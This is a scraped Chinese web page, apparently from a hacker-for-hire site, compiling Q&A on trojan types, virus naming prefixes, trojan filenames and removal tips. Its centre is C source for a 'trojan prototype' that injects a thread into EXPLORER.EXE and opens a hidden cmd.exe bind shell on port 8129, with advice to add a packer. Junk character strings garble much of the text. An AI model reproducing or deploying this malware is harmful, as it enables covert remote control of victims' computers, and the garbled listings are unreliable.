黑客24小时在线接单的网站

黑客24小时在线接单的网站

木马病毒解毒代码大全(木马病毒的代码)

本文目录一览:

谁能给个 所有病毒 木马 的名称

一 木马的种类: PQ'k{

1破坏型 / qE2YeAv

zB2EnbQ,

惟一的功能就是破坏并且删除文件,可以自动的删除电脑上的DLL、INI、EXE文件 b ,::S

0BzV}`2

2、密码发送型 DXNF2^1.A

hK@i j

可以找到隐藏密码并把它们发送到指定的信箱。有人喜欢把自己的各种密码以文件的形式存放在计算机中,认为这样方便;还有人喜欢用WINDOWS提供的密码记忆功能,这样就可以不必每次都输入密码了。许多黑客软件可以寻找到这些文件,把它们送到黑客手中。也有些黑客软件长期潜伏,记录操作者的键盘操作,从中寻找有用的密码。 |#3}%4x

4n!+s 8[

3、远程访问型 v-cO 2 r

E~ty@

最广泛的是特洛伊马,只需有人运行了服务端程序,如果客户知道了服务端的IP地址,就可以实现远程控制。以下的程序可以实现观察"受害者"正在干什么,当然这个程序完全可以用在正道上的,比如监视学生机的操作。 #C*a@q3

uLZ U|\r

#5EP#? mf)

4.键盘记录木马 O3Ar' 2+

[bHxkb/k%-

这种特洛伊木马是非常简单的。它们只做一件事情,就是记录受害者的键盘敲击并且在LOG文件里查找密码。 9N$iht"\

^ab r$.

:-mya

5.DoS攻击木马 :\S;K[GBX

_ %}K1*

随着DoS攻击越来越广泛的应用,被用作DoS攻击的木马也越来越流行起来。当你入侵了一台机器,给他种上DoS攻击木马,那么日后这台计算机就成为你DoS攻击的最得力助手了。你控制的肉鸡数量越多,你发动DoS攻击取得成功的机率就越大。所以,这种木马的危害不是体现在被感染计算机上,而是体现在攻击者可以利用它来攻击一台又一台计算机,给网络造成很大的伤害和带来损失。 Q,} pf

()p`}w(

SX(n+( c

6.代理木马 BF7U.'b@w

gs5XU3UZ0

黑客在入侵的同时掩盖自己的足迹,谨防别人发现自己的身份是非常重要的,因此,给被控制的肉鸡种上代理木马,让其变成攻击者发动攻击的跳板就是代理木马最重要的任务。通过代理木马,攻击者可以在匿名的情况下使用Telnet,ICQ,IRC等程序,从而隐蔽自己的踪迹 c QUsF9F|

opS~u:

wQ1qYmh

7.FTP木马 HFq XaRo"

8mq9; |qh

这种木马可能是最简单和古老的木马了,它的惟一功能就是打开21端口,等待用户连接。现在新FTP木马还加上了密码功能,这样,只有攻击者本人才知道正确的密码,从而进人对方计算机。 % /V)% %6

lHpM^T!p?

8.程序杀手木马 ]|8mm|

*y5 3~h

上面的木马功能虽然形形色色,不过到了对方机器上要发挥自己的作用,还要过防木马软件这一关才行。常见的防木马软件有ZoneAlarm,Norton Anti-Virus等。程序杀手木马的功能就是关闭对方机器上运行的这类程序,让其他的木马更好地发挥作用 %V]X4w

,a+T2Oc

];+oPY6

9.反弹端口型木马 PCP'Fsc)(

Wr3%)ys;'

木马是木马开发者在分析了防火墙的特性后发现:防火墙对于连入的链接往往会进行非常严格的过滤,但是对于连出的链接却疏于防范。于是,与一般的木马相反,反弹端口型木马的服务端 (被控制端)使用主动端口,客户端 (控制端)使用被动端口。木马定时监测控制端的存在,发现控制端上线立即弹出端口主动连结控制端打开的主动端口;为了隐蔽起见,控制端的被动端口一般开在80,即使用户使用扫描软件检查自己的端口,发现类似TCP UserIP:1026 ControllerIP:80ESTABLISHED的情况,稍微疏忽一点,你就会以为是自己在浏览网页。 {)QOg-0

WW#e5}?gG

bo*N

二: DLGa8}MM2}

1开机磁区病毒 5jnH-`sP

|c*, T

2档案型病毒 FTx,

uq{}E]u

3巨集病毒 |rT! 64

jX$@.%jZp

4其他新种类的病毒 | ,~BEC1

@ *$D-c T

8{jjZP~c

y$u!-

u4f i07_

^ hx 9

三: Mf#Y!-r

5DnjD

6J=%!"z'~i

1计算机病毒名称 0ZEo$=

m=Z\ua3

` slYw

冲击波(WORM_MSBlast.A) 1| 6%

W97M_Etkill(宏病毒) iI7 2,SM/N

捣毁者(W97M_ TRASHER.D) s$|"Kw#K"

W =;lU/@

.......等等........... 5w8+^/"BG

(sUCCZ+\

nEX? mCq-F

2木马病毒 4ZV_=:N

木马病毒的前缀是:Trojan W?1tgT}

如Q尾巴:Trojan.QQPSW b"Um9p@M

网络游戏木马:Trojan.StartPage.FH等 V,+ $fzR!

!+=P#$

}Es)u$%I

3脚本病毒 h-CC5PcS

脚本病毒的前缀是:Script vxy gw1+Ru

如:红色代码Script.Redlof y T-u47X

)ImR18

M-![;wXy

4系统病毒 W ? s_

系统病毒的前缀为:Win32、PE、Win95、W32、W95等 }#X]GRA`b

如以前有名的CIH病毒就属于系统病毒 WGG#H~

E cF86i

c@N.Yk N

5宏病毒 |q7g+;m

宏病毒的前缀是:Macro,第二前缀有Word、Word97、Excel、Excel97等 8boAly\

如以前著名的美丽莎病毒Macro.Melissa。 "tR CN

}*k]cc:

KvG=]Ljv{

6蠕虫病毒 Q_ZBR{9e

蠕虫病毒的前缀是:Worm O|;j_}1J

大家比较熟悉的这类病毒有冲击波、震荡波等 tvE$A /s

{lnneNp/I

,.Z6unf

7捆绑机病毒 g0tT N

捆绑机病毒的前缀是:Binder VLh%$O_2

如系统杀手Binder.killsys Wdg ._Y

hYLtLV

8后门病毒 /9 Lu

后门病毒的前缀是:Backdoor :Od G=CF

如爱情后门病毒Worm.Lovgate.a/b/c !dnxlS.Q

":fy F_x

L2S=u[YK

9坏性程序病毒 W^W8HXID

破坏性程序病毒的前缀是:Harm -n68J_i^Jp

格式化C盘(Harm.formatC.f)、杀手命令(Harm.Command.Killer)等。 UnVcfJn/C

UF@y3C|"

nU*{2 S

10玩笑病毒 Q M2c,

玩笑病毒的前缀是:Joke pT* HVtD]

如:女鬼(Joke.Girlghost)病毒。 Vh WnDEl

R|c74VjL

Ml(CFh k@!

常见木马名称: 2KrW1\)?V^

~'Tr]jTg3

Mbbmanager.exe → 聪明基因 9$mZbD@,

_.exe → Tryit Mdm.exe → Doly 1.6-1.7 S) F7T5^

Aboutagirl.exe → 初恋情人 Microsoft.exe → 传奇密码使者 q@vatU(

Absr.exe → Backdoor.Autoupder Mmc.exe → 尼姆达病毒 os+t`o5H

Aplica32.exe → 将死者病毒 Mprdll.exe → Bla }Co_F

Avconsol.exe → 将死者病毒 Msabel32.exe → Cain and Abel \P.S

Avp.exe → 将死者病毒 Msblast.exe → 冲击波病毒 z =n\]$tT

Avp32.exe → 将死者病毒 Mschv.exe → Control 2Ay\U.S

Avpcc.exe → 将死者病毒 Msgsrv36.exe → Coma 0^rTUhD2

Avpm.exe → 将死者病毒 Msgsvc.exe → 火凤凰 xpKR\pF

Avserve.exe → 震荡波病毒 Msgsvr16.exe → Acid Shiver T c_u~

Bbeagle.exe → 恶鹰蠕虫病毒 Msie5.exe → Canasson rH6TWE x

Brainspy.exe → BrainSpy vBeta Msstart.exe → Backdoor.livup ]bewW~0

Cfiadmin.exe → 将死者病毒 Mstesk.exe → Doly 1.1-1.5 40_9!AJ

Cfiaudit.exe → 将死者病毒 Netip.exe → Spirit 2000 Beta `{^LEF~QU

Cfinet32.exe → 将死者病毒 Netspy.exe → 网络精灵 VFS-.cLE

Checkdll.exe → 网络公牛 Notpa.exe → Backdoor fC0GN _

Cmctl32.exe → Back Construction Odbc.exe → Telecommando ^jE$F:C|7

Command.exe → AOL Trojan Pcfwallicon.exe → 将死者病毒 6*NmF'DR

Diagcfg.exe → 广外女生 Pcx.exe → Xplorer o)xTJL@e

Dkbdll.exe → Der Spaeher Pw32.exe → 将死者病毒 ah~bW\%

Dllclient.exe → Bobo Recycle - Bin.exe → s**tHeap liu+,0n

Dvldr32.exe → 口令病毒 Regscan.exe → 波特后门变种 B`S0/W{l

Esafe.exe → 将死者病毒 T → 尼姆达病毒 ""g\%i

Expiorer.exe → Acid Battery Thing.exe → Thing s-}q#j

Feweb.exe → 将死者病毒 User.exe → Schwindler Qs0r3\5

Flcss.exe → Funlove病毒 Vp32.exe → 将死者病毒 q!.l%@yK

Frw.exe → 将死者病毒 Vpcc.exe → 将死者病毒 ctgXj]

Icload95.exe → 将死者病毒 Vpm.exe → 将死者病毒 B P9$';$

Icloadnt.exe → 将死者病毒 Vsecomr.exe → 将死者病毒 yzJ{d

Icmon.exe → 将死者病毒 Server.exe → Revenger, WinCrash, YAT pN=R K

Icsupp95.exe → 将死者病毒 Service.exe → Trinoo l|mP ?

Iexplore.exe → 恶邮差病毒 Setup.exe → 密码病毒或Xanadu s.=+4Us

Rpcsrv.exe → 恶邮差病毒 Sockets.exe → Vampire 6G. kgPx

Rundll.exe → SCKISS爱情森林 Something.exe → BladeRunner q? m@sh#

Rundll32.exe→ 狩猎者病毒 Spfw.exe → 瑞波变种PX t;M6wfM^

Runouce.exe → 中国黑客病毒 Svchost.exe (线程105) → 蓝色代码 _(:IP?

Scanrew.exe → 传奇终结者 Sysedit32.exe → SCKISS爱情森林 ZS:%/6Q

Scvhost.exe → 安哥病毒 Sy***plor.exe → wCrat C^brgc

Server 1. 2.exe → Spirit 2000 1.2fixed Sy***plr.exe → 冰河 c{v}peI

Intel.exe → 传奇叛逆 Syshelp.exe → 恶邮差病毒 Uqd4V. ,

Internet.exe → 传奇幽灵 Sysprot.exe → Satans Back Door e7PSV7F@.

Internet.exe → 网络神偷 Sysrunt.exe → Ripper +//D`F9/

Kernel16.exe → Transmission Scount System.exe → s**tHeap q?+/97^7

Kernel32.exe → 坏透了或冰河 System32.exe → DeepThroat 1.0 }Q~@$HhZ

Kiss.exe → 传奇天使 Systray.exe → DeepThroat 2.0-3.1 wq !JS

Krn132.exe → 求职信病毒 Syswindow.exe → Trojan Cow mHW~,Fujk=

Libupdate.exe → BioNet Task_Bar.exe

怎么杀这些病毒(木马)?

你可以用这个软件到安全模式下去处理试试:

按杀毒软件提供的路径,记下来

1.下载一个软件:冰刃()

这是一个绿色软件,下载解压缩后即可使用。

如果杀软提供的病毒文件是一个dll的话,点击:进程 逐个右击右侧的进程--模块信息,仔细查看这个dll到底对哪些进程进行了插入(特别是那些系统进程),尝试用右侧的“强制解除”试试,能不能将这个dll文件从进程中解除出来(可能会碰上在某个进程中强制解除时机器会重启的现象)。

如果不行,请先运行regsvr32 /u 这个dll文件,将它从系统中反注册。

2.如果杀软提供的病毒文件是一个非dll文件的话,直接在冰刃左侧的栏里通过“文件”直接定位到这个文件所在的文件夹下,找到这个文件(木马文件一般在system32下)

3.通过按钮“创建时间”对这个文件夹下的文件进行排序,仔细查看与这个文件在创建时间是同一天的所有文件(但是不是都是与它一样是病毒文件,需要你判断)。右击它们一一删除。

4.搜索注册表里这个文件的键值,删除搜索到的。

5.重启电脑,这个东西应该清除干净了。

急呀~!这些代码是那种木马病毒?

1》troian.win32.inject.aemy

2》back door/win32.trojan

3》trojan/win32.superi

这些是病毒运行后,复制自身到系统目录下,衍生病毒文件,并删除自身。修改注册表,添加启动项,以达到随IEXPLORER.EXE进程的启动而启动的目的。helper.dll随IEXPLORER.EXE进程的启动而启动,进行劫持浏览器,键盘记录等相关病毒行为。主动连接网络,下载相关病毒文件信息。该病毒通过恶意网站、其它病毒/木马下载传播,可以盗取用户敏感信息。

用木马清道夫可以彻底清除!如果重装的话也可能在激活!因为它们产隐藏在C盘分区中,只有重新设置分区才行!用DOC工具箱来重新规划C盘分区!

木马程序源代码,不是蠕虫,特洛伊那类的是最简单的,有哪位高手可提供下,感激

制造木马病毒代码大全2008-06-08 19:46制造木马病毒代码大全

一个简单的木马原型基础代码添加上自己的XXX,加上变态的壳,做点小修改,就可以.....

#includewinsock2.h

#pragma comment(lib,"ws2_32.lib")

#includewindows.h

#include Shlwapi.h

#pragma comment(lib,"Shlwapi.lib")

#include tlhelp32.h

#include stdio.h

#include string.h

//参数结构 ;

typedef struct _RemotePara

{

DWORD dwLoadLibrary;

DWORD dwFreeLibrary;

DWORD dwGetProcAddress;

DWORD dwGetModuleHandle;

DWORD dwWSAStartup;

DWORD dwSocket;

DWORD dwhtons;

DWORD dwbind;

DWORD dwlisten;

DWORD dwaccept;

DWORD dwsend;

DWORD dwrecv;

DWORD dwclosesocket;

DWORD dwCreateProcessA;

DWORD dwPeekNamedPipe;

DWORD dwWriteFile;

DWORD dwReadFile;

DWORD dwCloseHandle;

DWORD dwCreatePipe;

DWORD dwTerminateProcess;

DWORD dwMessageBox;char strMessageBox[12];

char winsockDll[16];

char cmd[10];

char Buff[4096];

char telnetmsg[60];

}RemotePara; // 提升应用级调试权限

BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable);

// 根据进程名称得到进程ID

DWORD GetPidByName(char *szName); // 远程线程执行体

DWORD __stdcall ThreadProc(RemotePara *Para)

{

WSADATA WSAData;

WORD nVersion;

SOCKET listenSocket;

SOCKET clientSocket;struct sockaddr_in server_addr;

struct sockaddr_in client_addr;int iAddrSize = sizeof(client_addr);SECURITY_ATTRIBUTES sa;HANDLE hReadPipe1;

HANDLE hWritePipe1;

HANDLE hReadPipe2;

HANDLE hWritePipe2;STARTUPINFO si;

PROCESS_INFORMATION ProcessInformation;

unsigned long lBytesRead = 0;typedef HINSTANCE (__stdcall *PLoadLibrary)(char*);

typedef FARPROC (__stdcall *PGetProcAddress)(HMODULE, LPCSTR);

typedef HINSTANCE (__stdcall *PFreeLibrary)( HINSTANCE );

typedef HINSTANCE (__stdcall *PGetModuleHandle)(HMODULE);FARPROC PMessageBoxA;

FARPROC PWSAStartup;

FARPROC PSocket;

FARPROC Phtons;

FARPROC Pbind;

FARPROC Plisten;

FARPROC Paccept;

FARPROC Psend;

FARPROC Precv;

FARPROC Pclosesocket;

FARPROC PCreateProcessA;

FARPROC PPeekNamedPipe;

FARPROC PWriteFile;

FARPROC PReadFile;

FARPROC PCloseHandle;

FARPROC PCreatePipe;

FARPROC PTerminateProcess;PLoadLibrary LoadLibraryFunc = (PLoadLibrary)Para-dwLoadLibrary;

PGetProcAddress GetProcAddressFunc = (PGetProcAddress)Para-dwGetProcAddress;

PFreeLibrary FreeLibraryFunc = (PFreeLibrary)Para-dwFreeLibrary;

PGetModuleHandle GetModuleHandleFunc = (PGetModuleHandle)Para-dwGetModuleHandle;LoadLibraryFunc(Para-winsockDll);PWSAStartup = (FARPROC)Para-dwWSAStartup;

PSocket = (FARPROC)Para-dwSocket;

Phtons = (FARPROC)Para-dwhtons;

Pbind = (FARPROC)Para-dwbind;

Plisten = (FARPROC)Para-dwlisten;

Paccept = (FARPROC)Para-dwaccept;

Psend = (FARPROC)Para-dwsend;

Precv = (FARPROC)Para-dwrecv;

Pclosesocket = (FARPROC)Para-dwclosesocket;

PCreateProcessA = (FARPROC)Para-dwCreateProcessA;

PPeekNamedPipe = (FARPROC)Para-dwPeekNamedPipe;

PWriteFile = (FARPROC)Para-dwWriteFile;

PReadFile = (FARPROC)Para-dwReadFile;

PCloseHandle = (FARPROC)Para-dwCloseHandle;

PCreatePipe = (FARPROC)Para-dwCreatePipe;

PTerminateProcess = (FARPROC)Para-dwTerminateProcess;

PMessageBoxA = (FARPROC)Para-dwMessageBox;nVersion = MAKEWORD(2,1);

PWSAStartup(nVersion, (LPWSADATA)WSAData);

listenSocket = PSocket(AF_INET, SOCK_STREAM, 0);

if(listenSocket == INVALID_SOCKET)return 0;server_addr.sin_family = AF_INET;

server_addr.sin_port = Phtons((unsigned short)(8129));

server_addr.sin_addr.s_addr = INADDR_ANY;if(Pbind(listenSocket, (struct sockaddr *)server_addr, sizeof(SOCKADDR_IN)) != 0)return 0;

if(Plisten(listenSocket, 5))return 0;

clientSocket = Paccept(listenSocket, (struct sockaddr *)client_addr, iAddrSize);

// Psend(clientSocket, Para-telnetmsg, 60, 0);if(!PCreatePipe(hReadPipe1,hWritePipe1,sa,0))return 0;

if(!PCreatePipe(hReadPipe2,hWritePipe2,sa,0))return 0;ZeroMemory(si,sizeof(si)); //ZeroMemory是C运行库函数,可以直接调用

si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;

si.wShowWindow = SW_HIDE;

si.hStdInput = hReadPipe2;

si.hStdOutput = si.hStdError = hWritePipe1;if(!PCreateProcessA(NULL,Para-cmd,NULL,NULL,1,0,NULL,NULL,si,ProcessInformation))return 0;

while(1) {

memset(Para-Buff,0,4096);

PPeekNamedPipe(hReadPipe1,Para-Buff,4096,lBytesRead,0,0);

if(lBytesRead) {

if(!PReadFile(hReadPipe1, Para-Buff, lBytesRead, lBytesRead, 0))break;

if(!Psend(clientSocket, Para-Buff, lBytesRead, 0))break;

}else {

lBytesRead=Precv(clientSocket, Para-Buff, 4096, 0);

if(lBytesRead =0 ) break;

if(!PWriteFile(hWritePipe2, Para-Buff, lBytesRead, lBytesRead, 0))break;

}

}PCloseHandle(hWritePipe2);

PCloseHandle(hReadPipe1);

PCloseHandle(hReadPipe2);

PCloseHandle(hWritePipe1);

Pclosesocket(listenSocket);

Pclosesocket(clientSocket);// PMessageBoxA(NULL, Para-strMessageBox, Para-strMessageBox, MB_OK);return 0;

} int APIENTRY WinMain(HINSTANCE hInstance,

HINSTANCE hPrevInstance,

LPSTR lpCmdLine,

int nCmdShow)

{

const DWORD THREADSIZE=1024*4;

DWORD byte_write;

void *pRemoteThread;

HANDLE hToken,hRemoteProcess,hThread;

HINSTANCE hKernel,hUser32,hSock;

RemotePara myRemotePara,*pRemotePara;

DWORD pID;OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,hToken);

EnablePrivilege(hToken,SE_DEBUG_NAME,TRUE);// 获得指定进程句柄,并设其权限为PROCESS_ALL_ACCESS

pID = GetPidByName("EXPLORER.EXE");

if(pID == 0)return 0;

hRemoteProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,pID);

if(!hRemoteProcess)return 0; // 在远程进程地址空间分配虚拟内存

pRemoteThread = VirtualAllocEx(hRemoteProcess, 0, THREADSIZE, MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);

if(!pRemoteThread)return 0; // 将线程执行体ThreadProc写入远程进程

if(!WriteProcessMemory(hRemoteProcess, pRemoteThread, ThreadProc, THREADSIZE,0))return 0;ZeroMemory(myRemotePara,sizeof(RemotePara));

hKernel = LoadLibrary( "kernel32.dll");

myRemotePara.dwLoadLibrary = (DWORD)GetProcAddress(hKernel, "LoadLibraryA");

myRemotePara.dwFreeLibrary = (DWORD)GetProcAddress(hKernel, "FreeLibrary");

myRemotePara.dwGetProcAddress = (DWORD)GetProcAddress(hKernel, "GetProcAddress");

myRemotePara.dwGetModuleHandle = (DWORD)GetProcAddress(hKernel, "GetModuleHandleA");myRemotePara.dwCreateProcessA = (DWORD)GetProcAddress(hKernel, "CreateProcessA");

myRemotePara.dwPeekNamedPipe = (DWORD)GetProcAddress(hKernel, "PeekNamedPipe");

myRemotePara.dwWriteFile = (DWORD)GetProcAddress(hKernel, "WriteFile");

myRemotePara.dwReadFile = (DWORD)GetProcAddress(hKernel, "ReadFile");

myRemotePara.dwCloseHandle = (DWORD)GetProcAddress(hKernel, "CloseHandle");

myRemotePara.dwCreatePipe = (DWORD)GetProcAddress(hKernel, "CreatePipe");

myRemotePara.dwTerminateProcess = (DWORD)GetProcAddress(hKernel, "TerminateProcess");hSock = LoadLibrary("wsock32.dll");

myRemotePara.dwWSAStartup = (DWORD)GetProcAddress(hSock,"WSAStartup");

myRemotePara.dwSocket = (DWORD)GetProcAddress(hSock,"socket");

myRemotePara.dwhtons = (DWORD)GetProcAddress(hSock,"htons");

myRemotePara.dwbind = (DWORD)GetProcAddress(hSock,"bind");

myRemotePara.dwlisten = (DWORD)GetProcAddress(hSock,"listen");

myRemotePara.dwaccept = (DWORD)GetProcAddress(hSock,"accept");

myRemotePara.dwrecv = (DWORD)GetProcAddress(hSock,"recv");

myRemotePara.dwsend = (DWORD)GetProcAddress(hSock,"send");

myRemotePara.dwclosesocket = (DWORD)GetProcAddress(hSock,"closesocket");hUser32 = LoadLibrary("user32.dll");

myRemotePara.dwMessageBox = (DWORD)GetProcAddress(hUser32, "MessageBoxA"); strcat(myRemotePara.strMessageBox,"Sucess!\\0");

strcat(myRemotePara.winsockDll,"wsock32.dll\\0");

strcat(myRemotePara.cmd,"cmd.exe\\0");

strcat(myRemotePara.telnetmsg,"Connect Sucessful!\\n\\0"); //写进目标进程

pRemotePara =(RemotePara *)VirtualAllocEx (hRemoteProcess ,0,sizeof(RemotePara),MEM_COMMIT,PAGE_READWRITE);

if(!pRemotePara)return 0;

if(!WriteProcessMemory (hRemoteProcess ,pRemotePara,myRemotePara,sizeof myRemotePara,0))return 0; // 启动线程

hThread = CreateRemoteThread(hRemoteProcess ,0,0,(DWORD (__stdcall *)(void *))pRemoteThread ,pRemotePara,0,byte_write);

while(1) {}

FreeLibrary(hKernel);

FreeLibrary(hSock);

FreeLibrary(hUser32);

CloseHandle(hRemoteProcess);

CloseHandle(hToken);return 0;

} BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable){

TOKEN_PRIVILEGES tp;

tp.PrivilegeCount = 1;

LookupPrivilegeValue(NULL,szPrivName,tp.Privileges[0].Luid);

tp.Privileges[0].Attributes = fEnable ? SE_PRIVILEGE_ENABLED:0;

AdjustTokenPrivileges(hToken,FALSE,tp,sizeof(tp),NULL,NULL);

return((GetLastError() == ERROR_SUCCESS));

}DWORD GetPidByName(char *szName)

{

HANDLE hProcessSnap = INVALID_HANDLE_VALUE;

PROCESSENTRY32 pe32={0};

DWORD dwRet=0;hProcessSnap =CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

if(hProcessSnap == INVALID_HANDLE_VALUE)return 0;pe32.dwSize = sizeof(PROCESSENTRY32);

if(Process32First(hProcessSnap, pe32))

{

do

{

if(StrCmpNI(szName,pe32.szExeFile,strlen(szName))==0)

{

dwRet=pe32.th32ProcessID;

break;

}

}while (Process32Next(hProcessSnap,pe32));

}

else return 0;if(hProcessSnap !=INVALID_HANDLE_VALUE)CloseHandle(hProcessSnap);

return dwRet;

关于电脑病毒的代号

1、系统病毒

系统病毒的前缀为:Win32、PE、Win95、W32、W95等。这些病毒的一般公有的特性是可以感染windows操作系统的 *.exe 和 *.dll 文件,并通过这些文件进行传播。如CIH病毒。

2、蠕虫病毒

蠕虫病毒的前缀是:Worm。这种病毒的公有特性是通过网络或者系统漏洞进行传播,很大部分的蠕虫病毒都有向外发送带毒邮件,阻塞网络的特性。比如冲击波(阻塞网络),小邮差(发带毒邮件) 等。

3、木马病毒、黑客病毒

木马病毒其前缀是:Trojan,黑客病毒前缀名一般为 Hack 。木马病毒的公有特性是通过网络或者系统漏洞进入用户的系统并隐藏,然后向外界泄露用户的信息,而黑客病毒则有一个可视的界面,能对用户的电脑进行远程控制。木马、黑客病毒往往是成对出现的,即木马病毒负责侵入用户的电脑,而黑客病毒则会通过该木马病毒来进行控制。现在这两种类型都越来越趋向于整合了。一般的木马如QQ消息尾巴木马 Trojan.QQ3344 ,还有大家可能遇见比较多的针对网络游戏的木马病毒如 Trojan.LMir.PSW.60 。这里补充一点,病毒名中有PSW或者什么PWD之类的一般都表示这个病毒有盗取密码的功能(这些字母一般都为“密码”的英文“password”的缩写)一些黑客程序如:网络枭雄(Hack.Nether.Client)等。

4、脚本病毒

脚本病毒的前缀是:Script。脚本病毒的公有特性是使用脚本语言编写,通过网页进行的传播的病毒,如红色代码(Script.Redlof)——可不是我们的老大代码兄哦 ^_^。脚本病毒还会有如下前缀:VBS、JS(表明是何种脚本编写的),如欢乐时光(VBS.Happytime)、十四日(Js.Fortnight.c.s)等。

5、宏病毒

其实宏病毒是也是脚本病毒的一种,由于它的特殊性,因此在这里单独算成一类。宏病毒的前缀是:Macro,第二前缀是:Word、Word97、Excel、Excel97(也许还有别的)其中之一。凡是只感染WORD97及以前版本WORD文档的病毒采用Word97做为第二前缀,格式是:Macro.Word97;凡是只感染WORD97以后版本WORD文档的病毒采用Word做为第二前缀,格式是:Macro.Word;凡是只感染EXCEL97及以前版本EXCEL文档的病毒采用Excel97做为第二前缀,格式是:Macro.Excel97;凡是只感染EXCEL97以后版本EXCEL文档的病毒采用Excel做为第二前缀,格式是:Macro.Excel,依此类推。该类病毒的公有特性是能感染OFFICE系列文档,然后通过OFFICE通用模板进行传播,如:著名的美丽莎(Macro.Melissa)。

6、后门病毒

后门病毒的前缀是:Backdoor。该类病毒的公有特性是通过网络传播,给系统开后门,给用户电脑带来安全隐患。如54很多朋友遇到过的IRC后门Backdoor.IRCBot 。

7、病毒种植程序病毒

这类病毒的公有特性是运行时会从体内释放出一个或几个新的病毒到系统目录下,由释放出来的新病毒产生破坏。如:冰河播种者(Dropper.BingHe2.2C)、MSN射手(Dropper.Worm.Smibag)等。

8.破坏性程序病毒

破坏性程序病毒的前缀是:Harm。这类病毒的公有特性是本身具有好看的图标来诱惑用户点击,当用户点击这类病毒时,病毒便会直接对用户计算机产生破坏。如:格式化C盘(Harm.formatC.f)、杀手命令(Harm.Command.Killer)等。

9.玩笑病毒

玩笑病毒的前缀是:Joke。也称恶作剧病毒。这类病毒的公有特性是本身具有好看的图标来诱惑用户点击,当用户点击这类病毒时,病毒会做出各种破坏操作来吓唬用户,其实病毒并没有对用户电脑进行任何破坏。如:女鬼(Joke.Girlghost)病毒。

10.捆绑机病毒

捆绑机病毒的前缀是:Binder。这类病毒的公有特性是病毒作者会使用特定的捆绑程序将病毒与一些应用程序如QQ、IE捆绑起来,表面上看是一个正常的文件,当用户运行这些捆绑病毒时,会表面上运行这些应用程序,然后隐藏运行捆绑在一起的病毒,从而给用户造成危害。如:捆绑QQ(Binder.QQPass.QQBin)、系统杀手(Binder.killsys)等

木马大全,我想要有关木马病毒的各个名称?

1、系统病毒

系统病毒的前缀为:Win32、PE、Win95、W32、W95等。这些病毒的一般公有的特性是可以感染windows操作系统的 *.exe 和 *.dll 文件,并通过这些文件进行传播。如CIH病毒。

2、蠕虫病毒

蠕虫病毒的前缀是:Worm。这种病毒的公有特性是通过网络或者系统漏洞进行传播,很大部分的蠕虫病毒都有向外发送带毒邮件,阻塞网络的特性。比如冲击波(阻塞网络),小邮差(发带毒邮件) 等。

3、木马病毒、黑客病毒

木马病毒其前缀是:Trojan,黑客病毒前缀名一般为 Hack 。木马病毒的公有特性是通过网络或者系统漏洞进入用户的系统并隐藏,然后向外界泄露用户的信息,而黑客病毒则有一个可视的界面,能对用户的电脑进行远程控制。木马、黑客病毒往往是成对出现的,即木马病毒负责侵入用户的电脑,而黑客病毒则会通过该木马病毒来进行控制。现在这两种类型都越来越趋向于整合了。一般的木马如QQ消息尾巴木马 Trojan.qq3344 ,还有大家可能遇见比较多的针对网络游戏的木马病毒如 Trojan.LMir.PSW.60 。这里补充一点,病毒名中有PSW或者什么PWD之类的一般都表示这个病毒有盗取密码的功能(这些字母一般都为“密码”的英文“password”的缩写)一些黑客程序如:网络枭雄(Hack.Nether.Client)等。

4、脚本病毒

脚本病毒的前缀是:Script。脚本病毒的公有特性是使用脚本语言编写,通过网页进行的传播的病毒,如红色代码(Script.Redlof)。脚本病毒还会有如下前缀:VBS、JS(表明是何种脚本编写的),如欢乐时光(VBS.Happytime)、十四日(Js.Fortnight.c.s)等。

建议你使用腾讯电脑管家来进行病毒查杀

因为腾讯电脑管家是4+1杀毒引擎,管家反病毒引擎、金山云查杀引擎、小红伞本地查杀引擎和管家云引擎,新版本在此基础上启用了管家系统修复引擎,重点加强了“云安全”平台的建设和自研引擎的研发能力,也属国内首例采用“4+1”核“芯”杀毒引擎架构的。 所以杀毒能力是很强悍的,可以信赖!

  • 评论列表:
  •  鸠骨俛就
     发布于 2022-07-01 10:00:27  回复该评论
  • 造成很大的伤害和带来损失。 Q,} pf ()p`}w( SX(n+( c 6.代理木马 BF7U.'b@w gs5XU3UZ0 黑客在入侵的同时掩盖自己的足迹,谨防别人发现自己的身份是非常重要的,因此,给被控制的肉鸡种上代理木马,让其变成攻击者发动攻击
  •  末屿七禾
     发布于 2022-07-01 02:20:51  回复该评论
  • illsys Wdg ._Y hYLtLV 8后门病毒 /9 Lu 后门病毒的前缀是:Backdoor :Od G=CF 如爱情后门病毒Worm.Lovgate.a/b/c !dnxlS.Q ":fy F_x L2S=u[YK 9坏性程序病毒 W^W8HXID 破坏性程序病
  •  泪灼心児
     发布于 2022-07-01 09:46:46  回复该评论
  • (FARPROC)Para-dwPeekNamedPipe;PWriteFile = (FARPROC)Para-dwWriteFile;PRead
  •  夙世睬姥
     发布于 2022-07-01 01:00:31  回复该评论
  • 个dll到底对哪些进程进行了插入(特别是那些系统进程),尝试用右侧的“强制解除”试试,能不能将这个dll文件从进程中解除出来(可能会碰上在某个进程中强制解除时机器会重启的现象)。 如果不行,请先运行regsvr32 /u 这个dll文件,将它从系统中反注册。 2.如果杀软
  •  冬马芩酌
     发布于 2022-07-01 08:05:23  回复该评论
  • _VALUE)return 0;pe32.dwSize = sizeof(PROCESSENTRY32);if(Process32First(hProcessSnap, pe32)){ do {if(StrCmpNI(szName,pe32.szExe

发表评论:

Powered By

Copyright Your WebSite.Some Rights Reserved.